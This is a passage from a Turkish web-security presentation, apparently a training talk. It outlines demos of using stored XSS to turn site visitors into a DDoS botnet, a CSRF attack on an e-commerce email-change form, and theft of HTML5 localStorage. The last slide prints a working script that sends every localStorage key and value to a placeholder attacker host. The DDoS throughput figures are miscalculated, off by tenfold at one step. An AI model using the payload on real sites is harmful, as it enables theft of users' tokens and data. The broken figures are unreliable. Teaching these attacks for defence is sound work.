10. XSS Tehlikeleri - Demo - Step 2
● Dakika içinde 100 tekil kullanıcı alan web
sitesine ddos.js dosyası Stored XSS vb
yöntemler ile yerleştirilir.
● Örneğin : e-ticaret, gazete/haber siteleri.
● Sosyal mühendislik + reklam (JS!) ?
12. XSS Tehlikeleri - Demo - Step 3
● Request sunucuya erişecektir, dönen
değerin okunması ve işlemi alınması
yasaktır!
13. XSS Tehlikeleri - Demo - Sonuç
● Ortalama her tarayıcı 10,000 talep / dakika
● Dakika içerisinde 100 tekil kullanıcı alan bir
sitenin ziyaretçileri üzerinden;
● Toplam ≃ 1.200.000 / dakika
● = 200.000 / saniye
● WAF ? Firewall ?
16. CSRF - Demo - Step 1
1. Hedef : eticaret sitesi kullanıcıları.
2. Kullanıcı mail adresi değişikliği işleminde
mevcut şifre talep edilmemektedir.
3. Uygulama genelinde CSRF Token
kullanılmamıştır.
26. HTML5 Local Storage
<script>
for(var i = 0; i < localStorage.length; i++){
var key = localStorage.key(i);
var a = new Image();
a.src="http://saldirgan/kaydet.php?key=" + key +
"&value=" + localStorage.getItem(key);
}
</script>